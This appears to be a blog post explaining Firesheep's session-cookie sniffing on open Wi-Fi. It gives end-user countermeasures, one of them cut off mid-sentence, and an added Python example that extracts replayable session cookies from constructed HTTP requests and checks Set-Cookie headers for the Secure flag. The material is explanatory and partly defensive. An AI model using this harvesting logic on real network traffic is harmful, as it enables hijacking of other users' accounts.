Firesheep is a WinPcap-based Firefox plug-in that lets anyone on an open wireless network sniff other users' session cookies for sites that use SSL only for the login page and not for the rest of the session. Once the user has authenticated, the browser sends the session cookie in the clear with every plain HTTP request, so whoever is capturing the traffic can copy that cookie into their own browser and take over the session without ever seeing the password.

Nothing new - but this is a problem that the web community has ignored for a long time.

Possible countermeasures for a typical end user:
  • Don't use open wireless networks :(
  • If you have to, only visit sites that support SSL for the entire session, not just the initial authentication (e.g.
  • Use a plug-in like ForceTLS (read the documentation to understand how it works and which sites it actually covers)
  • If you have a work laptop, connect to your corporate VPN first (and make sure all browser requests get routed through your corporate proxy rather than split-tunnelled straight out onto the open network)
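To make the mechanism concrete, here is an added example (not Firesheep's code, and not from the original post) that does in a few lines what a Firesheep-style sniffer does: parse cleartext HTTP requests captured off the wire, pull out the session cookie for each known site, and report what an attacker could replay. It then goes slightly beyond the end-user list above and checks the server side of the problem: a Set-Cookie header without the Secure attribute is what lets the browser keep sending the cookie over plain http:// after an https:// login. The hostnames, cookie names and cookie values are constructed for the example.

```python
"""Harvest session cookies from cleartext HTTP the way a Firesheep-style sniffer
does, and check Set-Cookie headers for the Secure attribute that prevents it.
Added example with constructed sample traffic; not Firesheep's own code."""
import re
from typing import Optional

# Constructed sample: cleartext HTTP requests as they would appear in a capture
# on an open wireless network (hypothetical hosts and cookie values).
SAMPLE_REQUESTS = [
    b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
    b"Cookie: sid=abc123; lang=en\r\nUser-Agent: x\r\n\r\n",
    b"GET /inbox HTTP/1.1\r\nHost: mail.example\r\n"
    b"Cookie: SESSIONID=deadbeef\r\n\r\n",
    b"GET /img/logo.png HTTP/1.1\r\nHost: cdn.example\r\n\r\n",
]

# Per-site knowledge of which cookie carries the authenticated session. Firesheep
# shipped such "handlers" per site; these entries are hypothetical.
SESSION_COOKIE_NAMES = {"social.example": "sid", "mail.example": "SESSIONID"}


def parse_http_request(raw: bytes) -> Optional[dict]:
    """Split a raw HTTP/1.x request into method, path and a lowercased header
    dict. Returns None for anything that is not a request (e.g. TLS records)."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    m = re.match(r"^(GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP/1\.[01]$", lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": m.group(1), "path": m.group(2), "headers": headers}


def parse_cookie_header(value: str) -> dict:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def harvest_sessions(requests):
    """Sniffer view: (host, cookie name, cookie value) for every request that
    carries a known session cookie in the clear. Each tuple is a ready-to-replay
    session; no password is needed."""
    found = []
    for raw in requests:
        req = parse_http_request(raw)
        if not req or "cookie" not in req["headers"]:
            continue
        host = req["headers"].get("host", "")
        cookies = parse_cookie_header(req["headers"]["cookie"])
        name = SESSION_COOKIE_NAMES.get(host)
        if name and name in cookies:
            found.append((host, name, cookies[name]))
    return found


def set_cookie_is_hijackable(set_cookie: str) -> bool:
    """Server side: without the Secure attribute the browser replays the cookie
    over plain http://, so an https:// login page alone does not help."""
    attrs = {a.strip().split("=")[0].lower() for a in set_cookie.split(";")[1:]}
    return "secure" not in attrs


if __name__ == "__main__":
    for host, name, value in harvest_sessions(SAMPLE_REQUESTS):
        print(f"{host}: {name}={value}  <- replayable session")
    for hdr in ("sid=abc123; Path=/; HttpOnly",
                "sid=abc123; Path=/; Secure; HttpOnly"):
        print(f"{hdr!r}: hijackable={set_cookie_is_hijackable(hdr)}")
```

The third sample request (a static image with no cookie) is skipped, which is the point of the per-site table: the sniffer only cares about the one cookie that is the session. The Secure attribute closes the hole from the site's side; serving the whole session over SSL is what the end-user advice above asks the site to do.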
